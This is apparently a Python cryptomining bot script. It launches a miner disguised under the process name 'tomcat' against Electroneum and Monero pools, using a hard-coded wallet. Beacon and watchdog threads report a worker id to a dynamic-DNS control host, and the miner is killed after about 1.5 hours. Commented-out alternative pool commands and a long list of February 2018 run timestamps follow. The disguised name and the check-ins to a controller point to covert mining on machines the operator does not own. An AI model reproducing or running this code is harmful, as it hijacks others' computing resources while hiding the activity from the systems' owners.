import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:17:03.874852
#2018-02-17 17:04:06.850113
#2018-02-17 18:52:05.681173
#2018-02-17 20:40:03.465361
#2018-02-17 22:26:07.676277
#2018-02-18 00:09:04.163370
#2018-02-18 02:01:01.699141
#2018-02-18 03:47:07.048385
#2018-02-18 05:35:02.795345
#2018-02-18 07:28:05.882616
#2018-02-18 09:16:07.097762
#2018-02-18 11:02:05.691317
#2018-02-18 12:48:06.209554
#2018-02-18 14:36:06.965977
#2018-02-18 16:25:05.902625
#2018-02-18 18:15:09.235789
#2018-02-18 20:01:07.321722
#2018-02-18 21:48:05.494346
#2018-02-18 23:37:01.763975
#2018-02-19 01:23:06.810439
#2018-02-19 03:12:06.669546
#2018-02-19 04:59:01.558608
#2018-02-19 06:43:02.231017
#2018-02-19 08:33:01.767042
#2018-02-19 10:21:07.511796
#2018-02-19 12:09:05.719145
#2018-02-19 13:56:04.313640
#2018-02-19 15:45:12.280079
#2018-02-19 17:34:06.173600
#2018-02-19 19:22:07.776441
#2018-02-19 21:08:05.963141
#2018-02-19 22:56:06.542459
#2018-02-20 00:41:05.798398
#2018-02-20 02:32:07.373698
#2018-02-20 04:22:06.275415
#2018-02-20 06:06:04.375881
#2018-02-20 07:51:07.351992
#2018-02-20 09:36:08.332263
#2018-02-20 11:21:06.505811
#2018-02-20 13:08:06.329822
#2018-02-20 14:51:04.428590
#2018-02-20 16:38:09.125574
#2018-02-20 18:24:04.050643
#2018-02-20 20:14:07.928406
#2018-02-20 22:01:05.672251
#2018-02-20 23:42:06.858059
#2018-02-21 01:26:07.889639
#2018-02-21 03:14:07.012290
#2018-02-21 05:02:07.803053
#2018-02-21 07:58:06.636953
#2018-02-21 09:44:04.266933
#2018-02-21 11:33:06.581649
#2018-02-21 13:22:08.834027
#2018-02-21 15:08:04.034202
#2018-02-21 16:59:07.237357
#2018-02-21 18:49:06.164122
#2018-02-21 20:36:04.278934
#2018-02-21 22:22:05.730893
#2018-02-22 00:12:01.557230
#2018-02-22 02:01:05.503787
#2018-02-22 03:47:03.638330
#2018-02-22 05:35:03.886568
#2018-02-22 07:20:07.065247
#2018-02-22 09:08:03.992791
#2018-02-22 10:56:04.022869
#2018-02-22 12:43:12.094222
#2018-02-22 14:31:08.860675
#2018-02-22 16:19:08.824120
#2018-02-22 18:06:09.638732
#2018-02-22 19:55:01.385374
#2018-02-22 21:46:08.310035
#2018-02-22 23:34:05.319709
#2018-02-23 01:22:04.395205
#2018-02-23 03:09:03.777730
#2018-02-23 04:57:04.092189
#2018-02-23 06:41:06.702570
#2018-02-23 08:31:07.851433
#2018-02-23 10:45:06.443709
#2018-02-23 12:43:05.779373
#2018-02-23 14:28:06.315498
#2018-02-23 16:18:08.333217
#2018-02-23 18:05:10.380369
#2018-02-23 19:51:08.664839
#2018-02-23 21:34:01.244800
#2018-02-23 23:21:07.600622
#2018-02-24 01:12:06.668111
#2018-02-24 03:04:05.325479
#2018-02-24 04:50:06.408334
#2018-02-24 06:36:05.475732
#2018-02-24 08:25:05.450478
#2018-02-24 10:12:06.317901
#2018-02-24 12:07:01.844665
#2018-02-24 13:54:03.508669
#2018-02-24 15:43:06.151593
#2018-02-24 17:36:06.060072
#2018-02-24 19:22:07.037797
#2018-02-24 21:13:07.334037
#2018-02-24 23:48:06.056681
#2018-02-25 03:07:07.354192
#2018-02-25 07:07:07.066674